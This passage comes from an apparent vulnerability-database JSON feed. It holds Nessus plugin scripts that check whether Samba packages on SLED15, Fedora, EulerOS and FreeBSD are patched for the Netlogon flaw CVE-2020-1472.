reference:\"libndr-standard0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libndr0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libnetapi-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libnetapi0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-credentials-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-credentials0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-errors-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-errors0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-hostconfig-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-hostconfig0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-passdb-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-passdb0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy-python3-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy0-python3-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-util-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-util0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamdb-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamdb0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbclient-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbclient0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbconf-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbconf0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbldap-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbldap2-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libsmbldap2-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libtevent-util-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libtevent-util0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwbclient-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwbclient0-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-ad-dc-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-ad-dc-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-client-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-client-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-core-devel-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-debugsource-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-dsdb-modules-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-dsdb-modules-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-python3-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-libs-python3-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-python3-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-python3-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-winbind-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.11.13+git.189.e9bd318cd13-4.11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:23", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-09-24T00:00:00", "type": "nessus", "title": "Fedora 32 : 2:samba (2020-0be2776ed3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-0BE2776ED3.NASL", "href": "https://www.tenable.com/plugins/nessus/140760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-0be2776ed3.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140760);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-0be2776ed3\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 32 : 2:samba (2020-0be2776ed3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-0be2776ed3\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"samba-4.12.7-0.fc32\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:48", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2181)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2181.NASL", "href": "https://www.tenable.com/plugins/nessus/141331", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141331);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP9 : samba (EulerOS-SA-2020-2181)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2181\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6b24497\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:13", "description": "The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator access by exploiting a netlogon protocol flaw.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "nessus", "title": "FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:samba410", "p-cpe:/a:freebsd:freebsd:samba411", "p-cpe:/a:freebsd:freebsd:samba412", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "href": "https://www.tenable.com/plugins/nessus/140677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140677);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"FreeBSD : samba -- Unauthenticated domain takeover via netlogon (24ace516-fad7-11ea-8d8c-005056a311d1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Samba Team reports :\n\nAn unauthenticated attacker on the network can gain administrator\naccess by exploiting a netlogon protocol flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2020-1472.html\");\n # https://vuxml.freebsd.org/freebsd/24ace516-fad7-11ea-8d8c-005056a311d1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e92322b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba410\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba411\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba412\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", 